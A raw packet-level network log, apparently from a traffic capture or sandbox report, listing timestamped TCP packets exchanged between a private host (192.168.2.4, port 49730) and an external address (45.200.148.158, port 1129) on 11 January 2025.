Jan 11, 2025 20:26:07.616580009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616592884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616595984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.616609097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616622925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616633892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.616636992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616651058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616653919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.616666079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616681099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616688013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.616695881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616710901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.616712093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617003918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617225885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617240906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617254972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617276907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617279053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617294073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617306948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617316008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617321968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617335081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617350101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617353916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617363930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617371082 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617378950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617393970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617595911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617609978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617630959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617634058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617645979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617660046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617662907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617675066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617690086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.617708921 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617732048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.617892981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.618060112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.618072987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.618087053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.618102074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.618110895 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.618117094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.618125916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.618133068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.618151903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.618166924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.618256092 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.704391956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704463959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704516888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704528093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.704550028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704586029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704617023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704627037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.704649925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704654932 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.704682112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704716921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704749107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704755068 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.704787970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.704799891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704833031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704865932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704896927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704909086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.704932928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704933882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.704967976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.704998970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705030918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705038071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705064058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705068111 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705096960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705128908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705133915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705159903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705192089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705224037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705229998 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705255032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705265999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705290079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705400944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705431938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705440044 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705466032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705481052 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705579042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705627918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705660105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705670118 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705692053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705698013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705724001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705756903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705789089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705795050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705826044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705827951 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.705935001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705970049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.705986977 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706018925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706051111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706084013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706100941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706115007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706124067 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706146955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706178904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706182957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706211090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706242085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706248045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706274033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706307888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706343889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706598997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706631899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706664085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706671953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706696033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706713915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706727982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706777096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706782103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706810951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706842899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706876040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706878901 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706907988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706913948 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.706943035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.706975937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707009077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707014084 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707051039 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707256079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707288027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707329988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707350016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707381964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707413912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707446098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707461119 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707478046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707488060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707511902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707545042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707547903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707576036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707608938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707639933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707648039 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707672119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707674026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707703114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707735062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707762003 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707767963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707799911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707808018 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707832098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707865000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707896948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.707906961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.707940102 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708199024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708234072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708265066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708297014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708302021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708328962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708334923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708360910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708391905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708424091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708430052 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708453894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708460093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708487034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708518982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708549976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708556890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708581924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708586931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708614111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708646059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708662987 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708678007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708709955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708725929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708743095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708775043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708806992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708812952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708841085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708844900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708904028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.708950043 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.708969116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.709059954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.709100962 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.709132910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.709166050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.709197998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.709206104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.709230900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.709274054 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.794960022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.794997931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795051098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795074940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795084000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795135975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795152903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795169115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795203924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795236111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795248032 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795269966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795277119 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795306921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795372009 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795382977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795432091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795465946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795496941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795497894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795531988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795535088 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795563936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795597076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795614004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795634031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795666933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795698881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795702934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795731068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795737982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795764923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795797110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795814037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.795829058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795861959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.795871019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796084881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796117067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796139956 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796149969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796180964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796212912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796219110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796243906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796248913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796272993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796287060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796300888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796317101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796323061 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796343088 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796386003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796401024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796432972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796593904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796608925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796623945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796638012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796643972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796653986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796662092 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796668053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796681881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796684027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796700954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796720982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796931028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796946049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796969891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796976089 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.796983957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.796998978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797013044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797014952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797027111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797030926 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797040939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797055960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797070026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797076941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797085047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797096014 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797118902 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797477961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797492981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797508001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797522068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797537088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797539949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797552109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797559977 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797566891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797581911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797588110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797611952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797806978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797822952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797837019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797851086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797863007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797866106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797883034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.797885895 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.797913074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.798012018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798027039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798039913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798054934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798067093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.798069000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798084974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798095942 CET	49730	1129	192.168.2.4	45.200.148.158
